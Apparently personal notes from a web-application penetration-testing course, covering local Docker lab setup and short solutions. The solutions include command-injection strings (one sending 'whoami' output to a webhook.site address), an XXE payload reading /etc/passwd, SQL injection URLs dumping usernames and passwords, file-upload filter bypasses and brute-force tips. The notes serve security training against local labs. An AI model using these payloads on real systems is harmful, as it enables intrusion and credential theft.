Web App Lab Setup

Lab Requirements
1 Kali Linux VM
pimpmykali
(optional) peh-web-labs.tar.gz
Burp Suite

Run pimpmykali.sh with E selection for PEH Course WebApp Labs

# Clone a Github repository in the "/opt" dir
cd /opt
sudo rm -rf pimpmykali/
sudo git clone https://github.com/Dewalt-arch/pimpmykali

sudo /opt/pimpmykali/pimpmykali.sh
# Run menu option E for the WebApp Labs
# The labs start automatically

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh

# To (only) STOP the labs
sudo docker stop $(sudo docker ps -aq)

# To STOP and CLEANUP the labs
cd $HOME/peh/labs
./cleanup-peh-labs.sh
# This script removes ALL DOCKER CONTAINERS and NETWORKS!!!

Run Burp Suite and open its proxy browser
Browse to http://localhost
The database can be initialized/reset at http://localhost/init.php

Lab solutions
Command Inj 0x02
https://tcm-sec.com/& whoami& asd https://tcm-sec.com/ | sleep 10 | asd
https://webhook.site/<id>/?whoami``
Command Inj 0x03
45123)^2))}';whoami;#
File upload 0x01
Intercept
Change contents
Or turn off JS
File upload 0x02
Bypass the client-side again
Intercept and change the content-type to image/png or image/jpeg
File upload 0x03
Bypass the client-side again
Intercept and change the content-type again
Use an extension that's not in the blocklist (.phtml)
Authentication 0x01
Brute force
Authentication 0x02
MFA code, switch username (code is OK for all users)
Or, just brute the code
Authentication 0x03
Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
common password list:
password
password123
letmein
manchesterunited
common usernames list: /usr/share/seclists/Usernames/Names/names.txt
XXE, IDOR, capstone
XXE 0x01
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >]>
<creds><user>username</user><password>pass</password></creds>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><password>pass</password></creds>
IDOR
fuzz the parameter
find an admin user (or all of the admin users)
Capstone
SQLi to get into admin panel File upload to get RCE
XSS in the message alert
XSS in account names probably? need to test
brute force user accounts
SQLi on adding rating
http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -
http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-
To do list
file upload capstone
auth0x03 testing

Previous6. Web Application NextWeb App - SQL Injection

Last updated 1 year ago

hashtagLab solutions

hashtagCommand Inj 0x02

hashtagCommand Inj 0x03

hashtagFile upload 0x01

hashtagFile upload 0x02

hashtagFile upload 0x03

hashtagAuthentication 0x01

hashtagAuthentication 0x02

hashtagAuthentication 0x03

hashtagXXE, IDOR, capstone

hashtagXXE 0x01

hashtagIDOR

hashtagCapstone

hashtagTo do list

Lab solutions

Command Inj 0x02

Command Inj 0x03

File upload 0x01

File upload 0x02

File upload 0x03

Authentication 0x01

Authentication 0x02

Authentication 0x03

XXE, IDOR, capstone

XXE 0x01

IDOR

Capstone

To do list